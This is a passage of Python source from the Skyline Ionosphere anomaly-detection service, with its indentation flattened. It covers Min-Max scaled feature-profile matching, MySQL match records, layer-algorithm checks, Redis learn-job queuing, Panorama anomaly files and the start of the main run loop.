df = pd.read_csv(minmax_fp_ts_csv, delimiter=',', header=None, names=['metric', 'timestamp', 'value'])
df.columns = ['metric', 'timestamp', 'value']
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to create data frame from %s' % (str(minmax_fp_ts_csv)))
try:
df_features = extract_features(
# @modified 20210101 - Task #3928: Update Skyline to use new tsfresh feature extraction method
# df, column_id='metric', column_sort='timestamp', column_kind=None,
# column_value=None, feature_extraction_settings=tsf_settings)
df, default_fc_parameters=EfficientFCParameters(),
column_id='metric', column_sort='timestamp', column_kind=None,
column_value=None, disable_progressbar=True)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to create df_features from %s' % (str(minmax_fp_ts_csv)))
del df
# Create transposed features csv
if not os.path.isfile(minmax_fp_fname_out):
# Transpose
df_t = df_features.transpose()
df_t.to_csv(minmax_fp_fname_out)
del df_t
else:
if LOCAL_DEBUG:
logger.debug('debug :: file exists - %s' % minmax_fp_fname_out)
try:
# Calculate the count and sum of the features values
df_sum = pd.read_csv(
minmax_fp_fname_out, delimiter=',', header=0,
names=['feature_name', 'value'])
df_sum.columns = ['feature_name', 'value']
df_sum['feature_name'] = df_sum['feature_name'].astype(str)
df_sum['value'] = df_sum['value'].astype(float)
minmax_fp_features_count = len(df_sum['value'])
minmax_fp_features_sum = df_sum['value'].sum()
logger.info('minmax_fp_ts - features_count: %s, features_sum: %s' % (str(minmax_fp_features_count), str(minmax_fp_features_sum)))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to create df_sum from %s' % (str(minmax_fp_fname_out)))
if minmax_fp_features_count > 0:
if LOCAL_DEBUG:
logger.debug('debug :: minmax_fp_features_count of the minmax_fp_ts is %s' % str(minmax_fp_features_count))
else:
logger.error('error :: minmax_fp_features_count is %s' % str(minmax_fp_features_count))
if not os.path.isfile(anomalous_ts_csv):
datapoints = minmax_anomalous_ts
converted = []
for datapoint in datapoints:
try:
new_datapoint = [float(datapoint[0]), float(datapoint[1])]
converted.append(new_datapoint)
except: # nosec
continue
del datapoints
for ts, value in converted:
utc_ts_line = '%s,%s,%s\n' % (base_name, str(int(ts)), str(value))
with open(anomalous_ts_csv, 'a') as fh:
fh.write(utc_ts_line)
del converted
df = pd.read_csv(anomalous_ts_csv, delimiter=',', header=None, names=['metric', 'timestamp', 'value'])
df.columns = ['metric', 'timestamp', 'value']
df_features_current = extract_features(
# @modified 20210101 - Task #3928: Update Skyline to use new tsfresh feature extraction method
# df, column_id='metric', column_sort='timestamp', column_kind=None,
# column_value=None, feature_extraction_settings=tsf_settings)
df, default_fc_parameters=EfficientFCParameters(),
column_id='metric', column_sort='timestamp', column_kind=None,
column_value=None, disable_progressbar=True)
del df
# Create transposed features csv
if not os.path.isfile(anomalous_fp_fname_out):
# Transpose
df_t = df_features_current.transpose()
df_t.to_csv(anomalous_fp_fname_out)
del df_t
# Calculate the count and sum of the features values
df_sum_2 = pd.read_csv(
anomalous_fp_fname_out, delimiter=',', header=0,
names=['feature_name', 'value'])
df_sum_2.columns = ['feature_name', 'value']
df_sum_2['feature_name'] = df_sum_2['feature_name'].astype(str)
df_sum_2['value'] = df_sum_2['value'].astype(float)
minmax_anomalous_features_count = len(df_sum_2['value'])
minmax_anomalous_features_sum = df_sum_2['value'].sum()
logger.info('minmax_anomalous_ts - minmax_anomalous_features_count: %s, minmax_anomalous_features_sum: %s' % (
str(minmax_anomalous_features_count),
str(minmax_anomalous_features_sum)))
if minmax_fp_features_sum and minmax_anomalous_features_sum:
percent_different = None
try:
fp_sum_array = [minmax_fp_features_sum]
calc_sum_array = [minmax_anomalous_features_sum]
percent_different = 100
sums_array = np.array([minmax_fp_features_sum, minmax_anomalous_features_sum], dtype=float)
calc_percent_different = np.diff(sums_array) / sums_array[:-1] * 100.
percent_different = calc_percent_different[0]
logger.info('percent_different between minmax scaled features sums - %s' % str(percent_different))
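# For example, a fp features sum of 1000.0 and an anomalous features
# sum of 1030.0 gives np.diff([1000.0, 1030.0]) / 1000.0 * 100 = 3.0,
# a 3 percent difference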
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to calculate percent_different from minmax scaled features sums')
# 0.0 is a valid percent_different so test for None rather than
# falsiness
if percent_different is not None:
almost_equal = None
try:
np.testing.assert_array_almost_equal(fp_sum_array, calc_sum_array)
almost_equal = True
except:
almost_equal = False
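# numpy.testing.assert_array_almost_equal defaults to 6 decimal
# places, so almost_equal is only True when the two sums agree to
# roughly six decimal places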
if almost_equal:
minmax_not_anomalous = True
logger.info('minmax scaled common features sums are almost equal, not anomalous')
# if diff_in_sums <= 1%:
if percent_different < 0:
new_pdiff = percent_different * -1
percent_different = new_pdiff
# @added 20190327 - Feature #2484: FULL_DURATION feature profiles
# Bifurcate for ionosphere_echo_check
if check_type == 'ionosphere':
mm_use_percent_similar = float(settings.IONOSPHERE_FEATURES_PERCENT_SIMILAR)
if check_type == 'ionosphere_echo_check':
try:
mm_use_percent_similar = float(settings.IONOSPHERE_ECHO_MINMAX_SCALING_FEATURES_PERCENT_SIMILAR)
except:
mm_use_percent_similar = 3.5
# @modified 20190327 - Feature #2484: FULL_DURATION feature profiles
# if percent_different < settings.IONOSPHERE_FEATURES_PERCENT_SIMILAR:
if percent_different < mm_use_percent_similar:
minmax_not_anomalous = True
# log
logger.info('not anomalous - minmax scaled features profile match - %s - %s' % (base_name, str(minmax_not_anomalous)))
logger.info(
'minmax scaled calculated features sum are within %s percent of fp_id %s with %s, not anomalous' %
(str(mm_use_percent_similar),
str(fp_id), str(percent_different)))
if check_type == 'ionosphere_echo_check':
logger.info('ionosphere_echo_check :: not anomalous - minmax scaled features profile match - %s' % (base_name))
if minmax_not_anomalous:
not_anomalous = True
minmax = 1
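# minmax is recorded as 1 so that the ionosphere_matched row created
# further down reflects that this match was made on Min-Max scaled
# features rather than on the unscaled features sums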
# Created time series resources for graphing in
# the matched page
try:
if os.path.isfile(minmax_fp_ts_csv):
self.remove_metric_check_file(str(minmax_fp_ts_csv))
except:
pass
try:
if os.path.isfile(minmax_fp_fname_out):
self.remove_metric_check_file(str(minmax_fp_fname_out))
except:
pass
# @added 20190327 - Feature #2484: FULL_DURATION feature profiles
# Clean up echo files
if echo_check:
echo_calculated_feature_file = '%s/%s.echo.tsfresh.input.csv.features.transposed.csv' % (metric_training_data_dir, base_name)
try:
if os.path.isfile(echo_calculated_feature_file):
self.remove_metric_check_file(str(echo_calculated_feature_file))
except:
pass
echo_features_file = '%s/%s.%s.echo.fp.details.txt' % (metric_training_data_dir, str(metric_timestamp), base_name)
try:
if os.path.isfile(echo_features_file):
self.remove_metric_check_file(str(echo_features_file))
except:
pass
# Clean up
if minmax_check:
try:
clean_file = anomalous_ts_csv
if os.path.isfile(anomalous_ts_csv):
self.remove_metric_check_file(str(anomalous_ts_csv))
logger.info('cleaned up - %s' % clean_file)
except:
logger.info('no anomalous_ts_csv file to clean up')
try:
clean_file = anomalous_fp_fname_out
if os.path.isfile(anomalous_fp_fname_out):
self.remove_metric_check_file(str(anomalous_fp_fname_out))
logger.info('cleaned up - %s' % clean_file)
except:
logger.info('no anomalous_fp_fname_out file to clean up')
# END - Feature #2404: Ionosphere - fluid approximation
if not_anomalous:
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# self.not_anomalous.append(base_name)
redis_set = 'ionosphere.not_anomalous'
data = base_name
try:
self.redis_conn.sadd(redis_set, data)
except:
logger.info(traceback.format_exc())
logger.error('error :: failed to add %s to Redis set %s' % (
str(data), str(redis_set)))
# update matched_count in ionosphere_table
matched_timestamp = int(time())
# @added 20170804 - Bug #2130: MySQL - Aborted_clients
# Set a conditional here to only get_an_engine if no engine, this
# is probably responsible for the Aborted_clients, as it would have
# left the acquired engine orphaned
# Testing on skyline-dev-3-40g-gra1 Fri Aug 4 16:08:14 UTC 2017
if not engine:
try:
engine, log_msg, trace = get_an_engine()
except:
logger.error(traceback.format_exc())
logger.error('error :: could not get a MySQL engine to update matched details in db for %s' % (str(fp_id)))
if not engine:
logger.error('error :: engine not obtained to update matched details in db for %s' % (str(fp_id)))
try:
connection = engine.connect()
connection.execute(
ionosphere_table.update(
ionosphere_table.c.id == fp_id).
values(matched_count=ionosphere_table.c.matched_count + 1,
last_matched=matched_timestamp))
connection.close()
logger.info('updated matched_count for %s' % str(fp_id))
except:
logger.error(traceback.format_exc())
logger.error('error :: could not update matched_count and last_matched for %s ' % str(fp_id))
# @added 20170107 - Feature #1844: ionosphere_matched DB table
# Added ionosphere_matched update
# @modified 20170804 - Bug #2130: MySQL - Aborted_clients
# Set a conditional here to only get_an_engine if no engine, this
# is probably responsible for the Aborted_clients, as it would have
# left the acquired engine orphaned
# Testing on skyline-dev-3-40g-gra1 Fri Aug 4 16:08:14 UTC 2017
if not engine:
try:
engine, log_msg, trace = get_an_engine()
except:
logger.error(traceback.format_exc())
logger.error('error :: could not get a MySQL engine to update ionosphere_matched for %s' % (str(fp_id)))
if not engine:
logger.error('error :: engine not obtained to update ionosphere_matched for %s' % (str(fp_id)))
try:
ionosphere_matched_table, log_msg, trace = ionosphere_matched_table_meta(skyline_app, engine)
logger.info(log_msg)
logger.info('ionosphere_matched_table OK')
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to get ionosphere_matched_table meta for %s' % base_name)
# @added 20180620 - Feature #2404: Ionosphere - fluid approximation
# Added minmax scaling values
if minmax_not_anomalous == 1:
minmax_fp_features_sum = float(minmax_fp_features_sum)
minmax_fp_features_count = int(minmax_fp_features_count)
minmax_anomalous_features_sum = float(minmax_anomalous_features_sum)
minmax_anomalous_features_count = int(minmax_anomalous_features_count)
else:
minmax_fp_features_sum = 0
minmax_fp_features_count = 0
minmax_anomalous_features_sum = 0
minmax_anomalous_features_count = 0
# @added 20190919 - Feature #2484: FULL_DURATION feature profiles
# If there are additional echo fps then the database can be
# updated with the fp_count_with_echo value for fp_count in
# the ionosphere_matched table
if fp_count_with_echo > fp_count:
fp_count = fp_count_with_echo
try:
connection = engine.connect()
# @modified 20170107 - Feature #1852: Ionosphere - features_profile matched graphite graphs
# Feature #1844: ionosphere_matched DB table
# Added all_calc_features_sum, all_calc_features_count,
# sum_calc_values, common_features_count, tsfresh_version
ins = ionosphere_matched_table.insert().values(
fp_id=int(fp_id),
metric_timestamp=int(metric_timestamp),
all_calc_features_sum=float(all_calc_features_sum),
all_calc_features_count=len(all_calc_features_sum_list),
sum_common_values=float(sum_calc_values),
common_features_count=int(relevant_calc_feature_values_count),
tsfresh_version=str(tsfresh_version),
# @added 20180620 - Feature #2404: Ionosphere - fluid approximation
# Added minmax scaling values
minmax=minmax,
minmax_fp_features_sum=minmax_fp_features_sum,
minmax_fp_features_count=minmax_fp_features_count,
minmax_anomalous_features_sum=minmax_anomalous_features_sum,
minmax_anomalous_features_count=minmax_anomalous_features_count,
# @added 2018075 - Task #2446: Optimize Ionosphere
# Branch #2270: luminosity
fp_count=fp_count, fp_checked=fp_checked)
result = connection.execute(ins)
connection.close()
new_matched_id = result.inserted_primary_key[0]
# @modified 20180620 - Feature #2404: Ionosphere - fluid approximation
# Added minmax
if minmax == 0:
logger.info('new ionosphere_matched id: %s' % str(new_matched_id))
else:
logger.info('new minmax scaled ionosphere_matched id: %s' % str(new_matched_id))
except:
logger.error(traceback.format_exc())
logger.error(
'error :: could not update ionosphere_matched for %s with timestamp %s' % (
str(fp_id), str(metric_timestamp)))
# @added 20170331 - Task #1988: Review - Ionosphere layers - always show layers
# Feature #1960: ionosphere_layers
# Added mirror functionality of the layers_id_matched_file
# for feature profile matches too, as it has proved useful
# in the frontend with regard to training data sets being
# matched by layers, so the same is done in the frontend
# training data for feature profile matches too.
if not_anomalous:
profile_id_matched_file = '%s/%s.profile_id_matched.fp_id' % (
metric_training_data_dir, base_name)
if not os.path.isfile(profile_id_matched_file):
try:
write_data_to_file(skyline_app, profile_id_matched_file, 'w', str(fp_id))
logger.info('added matched fp_id %s - %s' % (
str(fp_id), profile_id_matched_file))
except:
logger.info(traceback.format_exc())
logger.error('error :: failed to add matched fp_id %s - %s' % (
str(fp_id), profile_id_matched_file))
# @added 20170115 - Feature #1854: Ionosphere learn - generations
# Stop on the first match
break
# https://docs.scipy.org/doc/numpy/reference/generated/numpy.testing.assert_almost_equal.html
# @added 20161214 - Add a between timeframe option, e.g. if
# fp match, only see this as not anomalous if hour (and or min)
# is between x and y - handle rollovers, cron log archives, etc.
logger.info('debug :: %s is a features profile for %s' % (str(fp_id), base_name))
# @added 20170115 - Feature #1854: Ionosphere learn - generations
# If this is an ionosphere_learn check them we handle it before
# the others and exit and ionosphere_learn uses the Redis work
# queue. Here we go! Learn!
if added_by == 'ionosphere_learn':
if not_anomalous:
logger.info('an ionosphere_learn metric has been found to be not anomalous before')
# @added 20170607 - Feature #2010: Ionosphere learn - rate limiting profile learning
learning_rate_limited = False
now = int(time())
rate_limit_timestamp = now - 3600
rate_limit_datetime = datetime.fromtimestamp(rate_limit_timestamp)
f = '%Y-%m-%d %H:%M:%S'
after_datetime = rate_limit_datetime.strftime(f)
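# Rate limit learning: if a generation > 1 features profile has
# already been created for this metric in the last hour at a
# full_duration greater than or equal to the current one, skip
# creating another learnt profile on this run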
try:
connection = engine.connect()
# @modified 20170913 - Task #2160: Test skyline with bandit
# Added nosec to exclude from bandit tests
result = connection.execute(
'SELECT * FROM ionosphere WHERE metric_id=%s AND created_timestamp > \'%s\' AND generation > 1' % (str(metrics_id), str(after_datetime))) # nosec
for row in result:
last_full_duration = row['full_duration']
if int(full_duration) <= int(last_full_duration):
learning_rate_limited = True
break
except:
logger.error(traceback.format_exc())
logger.error('error :: determining whether learning should be rate limited')
if learning_rate_limited:
logger.info('learning currently dynamically rate limited on %s' % str(base_name))
# Exit the ionosphere_learn check
self.remove_metric_check_file(str(metric_check_file))
if engine:
engine_disposal(engine)
return
else:
logger.info('learning is not currently rate limited on %s' % str(base_name))
# @added 20170605 - Bug #2038: Ionosphere learn parent generation incorrect
# Determine generation of the matched fp not the last in the
# list
try:
# @modified 20170913 - Task #2160: Test skyline with bandit
# Added nosec to exclude from bandit tests
stmt = 'SELECT generation FROM ionosphere WHERE id=%s' % str(fp_id) # nosec
connection = engine.connect()
for row in engine.execute(stmt):
matched_fp_generation = int(row['generation'])
connection.close()
logger.info(
'determined matched fp_id %s is a generation %s profile' % (
str(fp_id), str(matched_fp_generation)))
current_fp_generation = matched_fp_generation
except:
logger.error(traceback.format_exc())
logger.error('error :: could not determine generation from ionosphere table for fp id %s' % str(fp_id))
logger.info(
'ionosphere_learn metric matches the generation %s features profile id %s - %s' % (
str(current_fp_generation), str(fp_id), base_name))
# Added Redis to work_set, learn will then go off and create
# the features profile with the parent training data if
# less than max_generations, although ionosphere_learn
# should not send Ionosphere any work if the result would
# be greater than max_generations
logger.info('adding work item to Redis set ionosphere.learn.work')
ionosphere_job = 'learn_fp_learnt'
work_deadline = 'Soft'
try:
logger.info(
'LEARNT :: adding work to Redis ionosphere.learn.work set - [\'%s\', \'%s\', %s, \'%s\', %s, %s] to create a learnt features profile' % (
work_deadline, str(ionosphere_job), str(metric_timestamp), base_name,
str(fp_id), str(current_fp_generation)))
# modified 20190412 - Task #2824: Test redis-py upgrade
# Task #2926: Update dependencies
# self.redis_conn.sadd('ionosphere.learn.work', ['Soft', str(ionosphere_job), int(metric_timestamp), base_name, int(fp_id), int(current_fp_generation)])
self.redis_conn.sadd('ionosphere.learn.work', str(['Soft', str(ionosphere_job), int(metric_timestamp), base_name, int(fp_id), int(current_fp_generation)]))
except:
logger.error(traceback.format_exc())
logger.error(
'error :: failed adding work to Redis ionosphere.learn.work set - [\'%s\', \'%s\', %s, \'%s\', %s, %s] to make a learn features profile later' % (
work_deadline, str(ionosphere_job), str(metric_timestamp), base_name,
str(fp_id), str(current_fp_generation)))
# Exit the ionosphere_learn check
self.remove_metric_check_file(str(metric_check_file))
if engine:
engine_disposal(engine)
return
# @added 20170306 - Feature #1960: ionosphere_layers
# Here we go, let us TEACH you properly. We only evaluate
# the Ionosphere layer algorithms after Skyline has had an
# opportunity to match the original and learnt features
# profiles. This enables the original, evolutionary,
# generations based learning to be continually evaluated.
# This needs to happen for any future implementation of
# Feature #1888: Ionosphere learn - evolutionary maturity forget
logger.info('layers algorithms check')
check_layers_algorithms = False
if not not_anomalous:
check_layers_algorithms = True
if added_by == 'ionosphere_learn':
check_layers_algorithms = False
logger.info('ionosphere_learn - layers algorithms check - False')
else:
logger.info('layers algorithms check - True, %s layers to be checked' % str(fp_layers_count))
else:
logger.info('a features profile matched as not_anomalous - layers algorithms check - False')
if check_layers_algorithms and fp_layers_present:
full_duration_in_hours = int(settings.FULL_DURATION) / 3600
mirage_full_duration_json_file = '%s/%s.mirage.redis.%sh.json' % (
metric_training_data_dir, base_name,
str(int(full_duration_in_hours)))
if os.path.isfile(mirage_full_duration_json_file):
full_duration_json_file = mirage_full_duration_json_file
else:
full_duration_json_file = '%s/%s.json' % (metric_training_data_dir, base_name)
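# The layers algorithms are run against the FULL_DURATION time series
# json from the training data dir, preferring the Mirage full duration
# Redis json file when one exists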
anomalous_timeseries = None
if os.path.isfile(full_duration_json_file):
logger.info('full duration ts json available for layers check - %s' % (full_duration_json_file))
try:
# Read the timeseries json file
with open((full_duration_json_file), 'r') as f:
raw_timeseries = f.read()
timeseries_array_str = str(raw_timeseries).replace('(', '[').replace(')', ']')
anomalous_timeseries = literal_eval(timeseries_array_str)
except:
logger.error(traceback.format_exc())
logger.error('error :: could not load json for layers check - %s' % (base_name))
if anomalous_timeseries:
logger.info('data points surfaced for layers check - %s' % (len(anomalous_timeseries)))
else:
logger.error('error :: full duration ts json for layers was not found - %s' % (full_duration_json_file))
matched_layers_id = None
for layers_id in fp_layers_ids:
if not not_anomalous:
logger.info('checking layers_id %s - %s layers profiles of %s possible layers' % (
str(layers_id), str(layers_checked_count), str(fp_layers_count)))
if not_anomalous:
logger.info('skipping checking layers_id %s - %s layers profiles of %s possible layers as layer id %s already matched' % (
str(layers_id), str(layers_checked_count), str(fp_layers_count), str(matched_layers_id)))
continue
if int(layers_id) != 0:
# @added 2018075 - Task #2446: Optimize Ionosphere
# Branch #2270: luminosity
# @modified 20181014 - Feature #2430: Ionosphere validate learnt features profiles page
# layers_checked += 1
layers_checked_count += 1
# @added 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# Added to Redis set here and commented out the
# self.layers_checked.append in the try below this
redis_set = 'ionosphere.layers_checked'
data = layers_id
try:
self.redis_conn.sadd(redis_set, data)
except:
logger.info(traceback.format_exc())
logger.error('error :: failed to add %s to Redis set %s' % (
str(data), str(redis_set)))
# Get the layers algorithms and run then on the timeseries
# @modified 20170307 - Feature #1960: ionosphere_layers
# Use except on everything, remember how fast Skyline can iterate
try:
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# Added to the ionosphere.layers_checked Redis set
# above
# self.layers_checked.append(layers_id)
# @added 2018075 - Task #2446: Optimize Ionosphere
# Branch #2270: luminosity
# not_anomalous = run_layer_algorithms(base_name, layers_id, anomalous_timeseries)
# @modified 20181013 - Feature #2430: Ionosphere validate learnt features profiles page
# not_anomalous = run_layer_algorithms(base_name, layers_id, anomalous_timeseries, fp_layers_count, layers_checked)
not_anomalous = run_layer_algorithms(base_name, layers_id, anomalous_timeseries, fp_layers_count, layers_checked_count)
if not_anomalous:
matched_layers_id = layers_id
except:
logger.error(traceback.format_exc())
logger.error('error :: run_layer_algorithms failed for layers_id - %s' % (str(layers_id)))
if not_anomalous:
logger.info('not_anomalous :: layers_id %s was matched after checking %s layers profiles of %s possible layers' % (
str(layers_id), str(layers_checked_count), str(fp_layers_count)))
else:
logger.info('still anomalous :: layers_id %s was NOT matched after checking %s layers profiles of %s possible layers' % (
str(layers_id), str(layers_checked_count), str(fp_layers_count)))
if not not_anomalous:
logger.info('anomalous - no features profiles layers were matched - %s' % base_name)
# @added 20170308 - Feature #1960: ionosphere_layers
# Feature #1854: Ionosphere learn
# A create a layer_id matched txt file in the training_data dir
# to advise the operator if a training_data set has been matched
# by a layer. Further below if app is not ionosphere_learn a
# 'learn_fp_generation' ionosphere_job is added so ionosphere_learn
# can still try and learning from the existing features profiles
# that exist even if a layer matched as not_anomalous.
if not_anomalous:
layers_id_matched_file = '%s/%s.layers_id_matched.layers_id' % (
metric_training_data_dir, base_name)
if not os.path.isfile(layers_id_matched_file):
try:
write_data_to_file(skyline_app, layers_id_matched_file, 'w', str(matched_layers_id))
logger.info('added matched layers_id %s - %s' % (
str(matched_layers_id), layers_id_matched_file))
except:
logger.info(traceback.format_exc())
logger.error('error :: failed to add matched layers_id %s - %s' % (
str(matched_layers_id), layers_id_matched_file))
else:
logger.info('no layers algorithm check required')
# Ionosphere layers DONE
# @added 20200904 - Feature #3734: waterfall alerts
# Remove the metric from the waterfall_alerts Redis set
# [metric, timestamp, value, added_to_waterfall_timestamp]
# waterfall_data = [metric[1], metric[2], metric[0], added_to_waterfall_timestamp]
remove_waterfall_alert(added_by, metric_timestamp, base_name)
if not not_anomalous:
logger.info('anomalous - no feature profiles were matched - %s' % base_name)
# @added 20170116 - Feature #1854: Ionosphere learn
# If this is an ionosphere_learn check an Ionosphere alert will
# not be sent back to Analyzer, Mirage or the ionosphere.learn.work
# Redis set. We exit, work is done.
if added_by == 'ionosphere_learn':
logger.info('ionosphere_learn check complete - %s' % base_name)
self.remove_metric_check_file(str(metric_check_file))
if engine:
engine_disposal(engine)
return
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# self.anomalous_metrics.append(base_name)
redis_set = 'ionosphere.anomalous_metrics'
data = base_name
try:
self.redis_conn.sadd(redis_set, data)
except:
logger.info(traceback.format_exc())
logger.error('error :: failed to add %s to Redis set %s' % (
str(data), str(redis_set)))
# Send to panorama as Analyzer and Mirage will only alert on the
# anomaly, they will not push it to Panorama
if settings.PANORAMA_ENABLED:
if not os.path.exists(settings.PANORAMA_CHECK_PATH):
mkdir_p(settings.PANORAMA_CHECK_PATH)
# Note:
# The values are enclosed in single quotes intentionally
# as the imp.load_source used results in a shift in the
# decimal position when double quoted, e.g.
# value = "5622.0" gets imported as
# 2016-03-02 12:53:26 :: 28569 :: metric variable - value - 562.2
# single quoting results in the desired,
# 2016-03-02 13:16:17 :: 1515 :: metric variable - value - 5622.0
added_at = str(int(time()))
source = 'graphite'
panorama_anomaly_data = 'metric = \'%s\'\n' \
'value = \'%s\'\n' \
'from_timestamp = \'%s\'\n' \
'metric_timestamp = \'%s\'\n' \
'algorithms = %s\n' \
'triggered_algorithms = %s\n' \
'app = \'%s\'\n' \
'source = \'%s\'\n' \
'added_by = \'%s\'\n' \
'added_at = \'%s\'\n' \
% (base_name, str(anomalous_value), str(int(from_timestamp)),
str(int(metric_timestamp)), str(settings.ALGORITHMS),
str(triggered_algorithms), skyline_app, source,
this_host, added_at)
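# As a purely illustrative example (hypothetical metric name and
# values), the resulting Panorama check file would contain lines like:
# metric = 'stats.example-server.requests'
# value = '5622.0'
# from_timestamp = '1601000000'
# metric_timestamp = '1601003600'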
# Create an anomaly file with details about the anomaly
panorama_anomaly_file = '%s/%s.%s.txt' % (
settings.PANORAMA_CHECK_PATH, added_at,
base_name)
try:
write_data_to_file(
skyline_app, panorama_anomaly_file, 'w',
panorama_anomaly_data)
logger.info('added panorama anomaly file :: %s' % (panorama_anomaly_file))
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# Moved to the Redis set function below
# self.sent_to_panorama.append(base_name)
except:
logger.error('error :: failed to add panorama anomaly file :: %s' % (panorama_anomaly_file))
logger.info(traceback.format_exc())
# @added 20190522 - Task #3034: Reduce multiprocessing Manager list usage
redis_set = 'ionosphere.sent_to_panorama'
data = base_name
try:
self.redis_conn.sadd(redis_set, data)
except:
logger.info(traceback.format_exc())
logger.error('error :: failed to add %s to Redis set %s' % (
str(data), str(redis_set)))
# alert ... hmmm the harder part, maybe not all the resources
# are already created, so just determining ALERTS and firing a
# trigger_alert (pull in alerter.py and mirage_alerters.py?)
# OR send back to app via Redis
# @modified 20170116 - Feature #1854: Ionosphere learn
# Only do the cache_key if not ionosphere_learn
if added_by != 'ionosphere_learn':
# @added 20200908 - Feature #3734: waterfall alerts
# Remove any waterfall_alert items
remove_waterfall_alert(added_by, metric_timestamp, base_name)
# @modified 20200908 - Feature #3734: waterfall alerts
# Use common return_to_sender_to_alert function
# cache_key = 'ionosphere.%s.alert.%s.%s' % (added_by, metric_timestamp, base_name)
# added 20190412 - Task #2824: Test redis-py upgrade
# Task #2926: Update dependencies
# Added cache_key_value
# cache_key_value = [float(anomalous_value), base_name, int(metric_timestamp), triggered_algorithms, full_duration]
# try:
# self.redis_conn.setex(
# cache_key, 300,
# # modified 20190412 - Task #2824: Test redis-py upgrade
# # Task #2926: Update dependencies
# # [float(anomalous_value), base_name, int(metric_timestamp), triggered_algorithms, full_duration])
# str(cache_key_value))
# logger.info(
# 'add Redis alert key - %s - %s' %
# (cache_key, str(cache_key_value)))
# except:
# logger.error(traceback.format_exc())
# logger.error(
# 'error :: failed to add Redis key - %s - [%s, \'%s\', %s, %s, %s]' %
# (cache_key, str(anomalous_value), base_name, str(int(metric_timestamp)),
# str(triggered_algorithms), str(full_duration)))
# @modified 20201001 - Task #3748: POC SNAB
# Added algorithms_run required to determine the anomalyScore
# so this needs to be sent to Ionosphere so Ionosphere
# can send it back on an alert.
return_to_sender_to_alert(added_by, metric_timestamp, base_name, anomalous_value, triggered_algorithms, full_duration, algorithms_run)
# @added 20170116 - Feature #1854: Ionosphere learn
# Added an ionosphere_learn job for the timeseries that did not
# match any profiles. Here we go! Learn!
if added_by != 'ionosphere_learn':
ionosphere_job = 'learn_fp_generation'
logger.info(
'adding an ionosphere_learn %s job for the timeseries that did not match any profiles - %s' % (
ionosphere_job, base_name))
try:
logger.info(
'adding work to Redis ionosphere.learn.work set - [\'Soft\', \'%s\', %s, \'%s\', None, None] to make a learn features profile later' % (
str(ionosphere_job), str(int(metric_timestamp)),
base_name))
# modified 20190412 - Task #2824: Test redis-py upgrade
# Task #2926: Update dependencies
# self.redis_conn.sadd('ionosphere.learn.work', ['Soft', str(ionosphere_job), int(metric_timestamp), base_name, None, None])
self.redis_conn.sadd('ionosphere.learn.work', str(['Soft', str(ionosphere_job), int(metric_timestamp), base_name, None, None]))
except:
logger.error(traceback.format_exc())
logger.error(
'error :: failed adding work to Redis ionosphere.learn.work set - [\'Soft\', \'%s\', %s, \'%s\', None, None] to make a learn features profile later' % (
str(ionosphere_job), str(int(metric_timestamp)),
base_name))
self.remove_metric_check_file(str(metric_check_file))
if engine:
engine_disposal(engine)
return
self.remove_metric_check_file(str(metric_check_file))
if engine:
engine_disposal(engine)
return
def run(self):
"""
Called when the process initializes.
"""
# Log management to prevent overwriting
# Allow the bin/<skyline_app>.d to manage the log
if os.path.isfile(skyline_app_logwait):
try:
logger.info('removing %s' % skyline_app_logwait)
os.remove(skyline_app_logwait)
except OSError:
logger.error('error :: failed to remove %s, continuing' % skyline_app_logwait)
pass
now = time()
log_wait_for = now + 5
while now < log_wait_for:
if os.path.isfile(skyline_app_loglock):
sleep(.1)
now = time()
else:
now = log_wait_for + 1
logger.info('starting %s run' % skyline_app)
if os.path.isfile(skyline_app_loglock):
logger.error('error :: bin/%s.d log management seems to have failed, continuing' % skyline_app)
try:
os.remove(skyline_app_loglock)
logger.info('log lock file removed')
except OSError:
logger.error('error :: failed to remove %s, continuing' % skyline_app_loglock)
pass
else:
logger.info('bin/%s.d log management done' % skyline_app)
# @added 20190524 - Bug #3050: Ionosphere - Skyline and Graphite feedback
logger.info('SKYLINE_FEEDBACK_NAMESPACES is set to %s' % str(SKYLINE_FEEDBACK_NAMESPACES))
while True:
now = time()
# Make sure Redis is up
try:
self.redis_conn.ping()
if ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: connected to Redis')
except:
logger.error('error :: cannot connect to redis at socket path %s' % (
settings.REDIS_SOCKET_PATH))
sleep(30)
# @modified 20180519 - Feature #2378: Add redis auth to Skyline and rebrow
# @added 20191115 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# if settings.REDIS_PASSWORD:
# self.redis_conn = StrictRedis(password=settings.REDIS_PASSWORD, unix_socket_path=settings.REDIS_SOCKET_PATH)
# else:
# self.redis_conn = StrictRedis(unix_socket_path=settings.REDIS_SOCKET_PATH)
self.redis_conn = get_redis_conn(skyline_app)
self.redis_conn_decoded = get_redis_conn_decoded(skyline_app)
continue
# Report app up
try:
self.redis_conn.setex(skyline_app, 120, now)
logger.info('updated Redis key for %s up' % skyline_app)
except:
logger.error('error :: failed to update Redis key for %s up' % skyline_app)
# @modified 20200330 - Feature #3462: Add IONOSPHERE_MANAGE_PURGE
# Wrapped purging up in a conditional to allow the user to offload
# purging to a script and cron if they so desire for any reason.
if IONOSPHERE_MANAGE_PURGE:
# purge_old_data_dirs after every check file run, this takes less
# than a second and keeps the purging somewhat consistent with
# input rate.
# @added 20200723 - Feature #3462: Add IONOSPHERE_MANAGE_PURGE
# Do not purge every run
try:
last_purge_timestamp = self.redis_conn.get(last_purge_key)
except:
logger.error('error :: failed to get Redis key %s' % last_purge_key)
last_purge_timestamp = 0
if not last_purge_timestamp:
try:
logger.info('purging any old training data')
self.purge_old_data_dirs(
settings.IONOSPHERE_DATA_FOLDER,
settings.IONOSPHERE_KEEP_TRAINING_TIMESERIES_FOR)
except:
logger.error('error :: purge_old_data_dirs - %s' % traceback.format_exc())
if ENABLE_IONOSPHERE_DEBUG:
logger.info(
'debug :: self.purge_old_data_dirs(%s, %s)' % (
settings.IONOSPHERE_DATA_FOLDER,
settings.IONOSPHERE_KEEP_TRAINING_TIMESERIES_FOR))
# @added 20170110 - Feature #1854: Ionosphere learn
# purge_old_data_dirs learn data
